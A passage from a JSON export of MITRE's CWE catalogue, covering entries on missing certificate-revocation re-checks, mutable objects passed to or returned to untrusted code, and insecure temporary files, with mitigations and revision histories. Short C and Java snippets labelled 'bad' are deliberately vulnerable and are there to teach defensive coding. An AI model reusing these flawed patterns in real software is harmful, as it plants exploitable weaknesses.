Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"}]}},"370":{"attr":{"@_ID":"370","@_Name":"Missing Check for Certificate Revocation after Initial Check","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not check the revocation status of a certificate after its initial revocation check, which can cause the software to perform privileged actions even after the certificate is revoked at a later time.","Extended_Description":"If the revocation status of a certificate is not checked before each action that requires privileges, the system may be subject to a race condition. If a certificate is revoked after the initial check, all subsequent actions taken with the owner of the revoked certificate will lose all benefits guaranteed by the certificate. In fact, it is almost certain that the use of a revoked certificate indicates malicious activity.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"299","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"296","@_View_ID":"1000"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"297","@_View_ID":"1000"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"298","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."},{"Phase":"Implementation"}]},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":[{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity","Note":"Trust may be assigned to an entity who is not who it claims to be."},{"Scope":"Integrity","Impact":"Modify Application Data","Note":"Data from an untrusted (and possibly malicious) source may be integrated."},{"Scope":"Confidentiality","Impact":"Read Application Data","Note":"Data may be disclosed to an entity impersonating a trusted entity, resulting in information disclosure."}]},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":"Ensure that certificates are checked for revoked status before each use of a protected resource. If the certificate is checked before each access of a protected resource, the delay subject to a possible race condition becomes almost negligible and significantly reduces the risk associated with this issue."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following code checks a certificate before performing an action.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"if (cert = SSL_get_peer_certificate(ssl)) {","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"foo=SSL_get_verify_result(ssl);if (X509_V_OK==foo)","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"foo=SSL_get_verify_result(ssl);","xhtml:br":["","","",""],"xhtml:i":["//do stuff","//do more stuff without the check."]}}}}}},"Body_Text":"While the code performs the certificate verification before each action, it does not check the result of the verification after the initial attempt. The certificate may have been revoked in the time between the privileged actions."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Race condition in checking for certificate revocation"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP20","Entry_Name":"Race Condition Window"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"26"}},{"attr":{"@_CAPEC_ID":"29"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-18"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":""Sin 13: Race Conditions." Page 205"}}]},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description, Other_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Name, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Demonstrative_Examples, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples, Modes_of_Introduction, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"}],"Previous_Entry_Name":{"#text":"Race Condition in Checking for Certificate Revocation","attr":{"@_Date":"2009-05-27"}}}},"372":{"attr":{"@_ID":"372","@_Name":"Incomplete Internal State Distinction","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not properly determine which state it is in, causing it to assume it is in state X when in fact it is in state Y, causing it to perform incorrect operations in a security-relevant manner.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"664","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Other"],"Impact":["Varies by Context","Unexpected State"]}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Incomplete Internal State Distinction"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"140"}},{"attr":{"@_CAPEC_ID":"74"}}]},"Notes":{"Note":[{"#text":"This conceptually overlaps other categories such as insufficient verification, but this entry refers to the product\'s incorrect perception of its own state.","attr":{"@_Type":"Relationship"}},{"#text":"This is probably resultant from other weaknesses such as unhandled error conditions, inability to handle out-of-order steps, multiple interpretation errors, etc.","attr":{"@_Type":"Relationship"}},{"#text":"This entry is being considered for deprecation. It was poorly-defined in PLOVER and is not easily described using the behavior/resource/property model of vulnerability theory.","attr":{"@_Type":"Maintenance"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Maintenance_Notes, Relationships, Relationship_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Maintenance_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Maintenance_Notes, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns"}]}},"373":{"attr":{"@_ID":"373","@_Name":"DEPRECATED: State Synchronization Error","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Deprecated"},"Description":"This entry was deprecated because it overlapped the same concepts as race condition (CWE-362) and Improper Synchronization (CWE-662).","Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-12","Modification_Importance":"Critical","Modification_Comment":"Deprecated entry"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Description, Likelihood_of_Exploit, Name, Other_Notes, Potential_Mitigations, Relationships, Taxonomy_Mappings, Time_of_Introduction, Type"}],"Previous_Entry_Name":{"#text":"State Synchronization Error","attr":{"@_Date":"2010-12-13"}}}},"374":{"attr":{"@_ID":"374","@_Name":"Passing Mutable Objects to an Untrusted Method","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The program sends non-cloned mutable data as an argument to a method or function.","Extended_Description":"The function or method that has been called can alter or delete the mutable data. This could violate assumptions that the calling function has made about its state. In situations where unknown code is called with references to mutable data, this external code could make changes to the data sent. If this data was not previously cloned, the modified data might not be valid in the context of execution.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"668","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C#","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Modify Memory","Note":"Potentially data could be tampered with by another function which should not have been tampered with."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Pass in data which should not be altered as constant or immutable."},{"Phase":"Implementation","Description":"Clone all mutable data before passing it into an external function . This is the preferred mitigation. This way, regardless of what changes are made to the data, a valid copy is retained for use by the class."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The following example demonstrates the weakness.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"private:public:","xhtml:div":[{"#text":"int foo;complexType bar;String baz;otherClass externalClass;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""]},{"#text":"void doStuff() {}","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"externalClass.doOtherStuff(foo, bar, baz)","attr":{"@_style":"margin-left:10px;"}}}],"xhtml:br":["",""]}},"Body_Text":"In this example, bar and baz will be passed by reference to doOtherStuff() which may change them."},{"Intro_Text":"In the following Java example, the BookStore class manages the sale of books in a bookstore, this class includes the member objects for the bookstore inventory and sales database manager classes. The BookStore class includes a method for updating the sales database and inventory when a book is sold. This method retrieves a Book object from the bookstore inventory object using the supplied ISBN number for the book class, then calls a method for the sales object to update the sales information and then calls a method for the inventory object to update inventory for the BookStore.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public class BookStore {}public class Book {}","xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"private BookStoreInventory inventory;private SalesDBManager sales;...public BookStore() {}public void updateSalesAndInventoryForBookSold(String bookISBN) {}...","xhtml:br":["","","","","","",""],"xhtml:i":["// constructor for BookStore","// other BookStore methods"],"xhtml:div":[{"#text":"this.inventory = new BookStoreInventory();this.sales = new SalesDBManager();...","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"Book book = inventory.getBookWithISBN(bookISBN);sales.updateSalesInformation(book);inventory.updateInventory(book);","xhtml:br":["","","","","",""],"xhtml:i":["// Get book object from inventory using ISBN","// update sales information for book sold","// update inventory"]}}]}},{"#text":"private String title;private String author;private String isbn;...","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","",""],"xhtml:i":"// Book object constructors and get/set methods"}],"xhtml:br":""}},{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"...public void updateSalesAndInventoryForBookSold(String bookISBN) {}...","xhtml:br":["",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"Book book = inventory.getBookWithISBN(bookISBN);Book bookSold = (Book) book.clone();sales.updateSalesInformation(bookSold);inventory.updateInventory(book);","xhtml:br":["","","","","","","",""],"xhtml:i":["// Get book object from inventory using ISBN","// Create copy of book object to make sure contents are not changed","// update sales information for book sold","// update inventory"]}}}}],"Body_Text":["However, in this example the Book object that is retrieved and passed to the method of the sales object could have its contents modified by the method. This could cause unexpected results when the book object is sent to the method for the inventory object to update the inventory.","In the Java programming language arguments to methods are passed by value, however in the case of objects a reference to the object is passed by value to the method. When an object reference is passed as a method argument a copy of the object reference is made within the method and therefore both references point to the same object. This allows the contents of the object to be modified by the method that holds the copy of the object reference. [REF-374]","In this case the contents of the Book object could be modified by the method of the sales object prior to the call to update the inventory.","To prevent the contents of the Book object from being modified, a copy of the Book object should be made before the method call to the sales object. In the following example a copy of the Book object is made using the clone() method and the copy of the Book object is passed to the method of the sales object. This will prevent any changes being made to the original Book object."]}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Passing mutable objects to an untrusted method"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"OBJ04-J","Entry_Name":"Provide mutable classes with copy functionality to safely allow passing instances to untrusted code"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP23","Entry_Name":"Exposed Data"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-18"}},{"attr":{"@_External_Reference_ID":"REF-374"}},{"attr":{"@_External_Reference_ID":"REF-375"}}]},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Name, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Demonstrative_Examples, Description, Other_Notes, Potential_Mitigations, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References"}],"Previous_Entry_Name":{"#text":"Mutable Objects Passed by Reference","attr":{"@_Date":"2010-06-21"}}}},"375":{"attr":{"@_ID":"375","@_Name":"Returning a Mutable Object to an Untrusted Caller","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"Sending non-cloned mutable data as a return value may result in that data being altered or deleted by the calling function.","Extended_Description":"In situations where functions return references to mutable data, it is possible that the external code which called the function may make changes to the data sent. If this data was not previously cloned, the class will then be using modified data which may violate assumptions about its internal state.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"668","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C#","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":{"Scope":["Access Control","Integrity"],"Impact":"Modify Memory","Note":"Potentially data could be tampered with by another function which should not have been tampered with."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Declare returned data which should not be altered as constant or immutable."},{"Phase":"Implementation","Description":"Clone all mutable data before returning references to it. This is the preferred mitigation. This way, regardless of what changes are made to the data, a valid copy is retained for use by the class."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"This class has a private list of patients, but provides a way to see the list :","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public class ClinicalTrial {}","xhtml:div":{"#text":"private PatientClass[] patientList = new PatientClass[50];public getPatients(...){}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":"","xhtml:div":{"#text":"return patientList;","attr":{"@_style":"margin-left:10px;"}}}}},"Body_Text":"While this code only means to allow reading of the patient list, the getPatients() method returns a reference to the class\'s original patient list instead of a reference to a copy of the list. Any caller of this method can arbitrarily modify the contents of the patient list even though it is a private member of the class."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Mutable object returned"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"OBJ04-J","Entry_Name":"Provide mutable classes with copy functionality to safely allow passing instances to untrusted code"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"OBJ05-J","Entry_Name":"Defensively copy private mutable class members before returning their references"},{"attr":{"@_Taxonomy_Name":"SEI CERT Perl Coding Standard"},"Entry_ID":"EXP34-PL","Entry_Name":"Do not modify $_ in list or sorting functions","Mapping_Fit":"Imprecise"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP23","Entry_Name":"Exposed Data"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-18"}}},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Name, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Description, Other_Notes, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Passing Mutable Objects to an Untrusted Method","attr":{"@_Date":"2010-09-27"}}}},"377":{"attr":{"@_ID":"377","@_Name":"Insecure Temporary File","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"Creating and using insecure temporary files can leave application and system data vulnerable to attack.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"668","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Files or Directories","Modify Files or Directories"]}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following code uses a temporary file for storing intermediate data gathered from the network before it is processed.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"if (tmpnam_r(filename)) {}...","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"FILE* tmp = fopen(filename,\\"wb+\\");while((recv(sock,recvbuf,DATA_SIZE, 0) > 0)&(amt!=0)) amt = fwrite(recvbuf,1,DATA_SIZE,tmp);","xhtml:br":["",""]}},"xhtml:br":""}},"Body_Text":"This otherwise unremarkable code is vulnerable to a number of different attacks because it relies on an insecure method for creating temporary files. The vulnerabilities introduced by this function and others are described in the following sections. The most egregious security problems related to temporary file creation have occurred on Unix-based operating systems, but Windows applications have parallel risks. This section includes a discussion of temporary file creation on both Unix and Windows systems. Methods and behaviors can vary between systems, but the fundamental risks introduced by each are reasonably constant."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Insecure Temporary File"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"CON33-C","Entry_Name":"Avoid race conditions when using library functions","Mapping_Fit":"Imprecise"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"FIO00-J","Entry_Name":"Do not operate on files in shared directories"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"155"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-6"}},{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 23, "Creating Temporary Files Securely" Page 682"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 9, "Temporary Files", Page 538"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 11, "File Squatting", Page 662"}}]},"Notes":{"Note":{"attr":{"@_Type":"Other"},"xhtml:p":["Applications require temporary files so frequently that many different mechanisms exist for creating them in the C Library and Windows(R) API. Most of these functions are vulnerable to various forms of attacks.","The functions designed to aid in the creation of temporary files can be broken into two groups based whether they simply provide a filename or actually open a new file. - Group 1: \\"Unique\\" Filenames: The first group of C Library and WinAPI functions designed to help with the process of creating temporary files do so by generating a unique file name for a new temporary file, which the program is then supposed to open. This group includes C Library functions like tmpnam(), tempnam(), mktemp() and their C++ equivalents prefaced with an _ (underscore) as well as the GetTempFileName() function from the Windows API. This group of functions suffers from an underlying race condition on the filename chosen. Although the functions guarantee that the filename is unique at the time it is selected, there is no mechanism to prevent another process or an attacker from creating a file with the same name after it is selected but before the application attempts to open the file. Beyond the risk of a legitimate collision caused by another call to the same function, there is a high probability that an attacker will be able to create a malicious collision because the filenames generated by these functions are not sufficiently randomized to make them difficult to guess. If a file with the selected name is created, then depending on how the file is opened the existing contents or access permissions of the file may remain intact. If the existing contents of the file are malicious in nature, an attacker may be able to inject dangerous data into the application when it reads data back from the temporary file. If an attacker pre-creates the file with relaxed access permissions, then data stored in the temporary file by the application may be accessed, modified or corrupted by an attacker. On Unix based systems an even more insidious attack is possible if the attacker pre-creates the file as a link to another important file. Then, if the application truncates or writes data to the file, it may unwittingly perform damaging operations for the attacker. This is an especially serious threat if the program operates with elevated permissions. Finally, in the best case the file will be opened with the a call to open() using the O_CREAT and O_EXCL flags or to CreateFile() using the CREATE_NEW attribute, which will fail if the file already exists and therefore prevent the types of attacks described above. However, if an attacker is able to accurately predict a sequence of temporary file names, then the application may be prevented from opening necessary temporary storage causing a denial of service (DoS) attack. This type of attack would not be difficult to mount given the small amount of randomness used in the selection of the filenames generated by these functions. - Group 2: \\"Unique\\" Files: The second group of C Library functions attempts to resolve some of the security problems related to temporary files by not only generating a unique file name, but also opening the file. This group includes C Library functions like tmpfile() and its C++ equivalents prefaced with an _ (underscore), as well as the slightly better-behaved C Library function mkstemp(). The tmpfile() style functions construct a unique filename and open it in the same way that fopen() would if passed the flags \\"wb+\\", that is, as a binary file in read/write mode. If the file already exists, tmpfile() will truncate it to size zero, possibly in an attempt to assuage the security concerns mentioned earlier regarding the race condition that exists between the selection of a supposedly unique filename and the subsequent opening of the selected file. However, this behavior clearly does not solve the function\'s security problems. First, an attacker can pre-create the file with relaxed access-permissions that will likely be retained by the file opened by tmpfile(). Furthermore, on Unix based systems if the attacker pre-creates the file as a link to another important file, the application may use its possibly elevated permissions to truncate that file, thereby doing damage on behalf of the attacker. Finally, if tmpfile() does create a new file, the access permissions applied to that file will vary from one operating system to another, which can leave application data vulnerable even if an attacker is unable to predict the filename to be used in advance. Finally, mkstemp() is a reasonably safe way create temporary files. It will attempt to create and open a unique file based on a filename template provided by the user combined with a series of randomly generated characters. If it is unable to create such a file, it will fail and return -1. On modern systems the file is opened using mode 0600, which means the file will be secure from tampering unless the user explicitly changes its access permissions. However, mkstemp() still suffers from the use of predictable file names and can leave an application vulnerable to denial of service attacks if an attacker causes mkstemp() to fail by predicting and pre-creating the filenames to be used."]}},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated 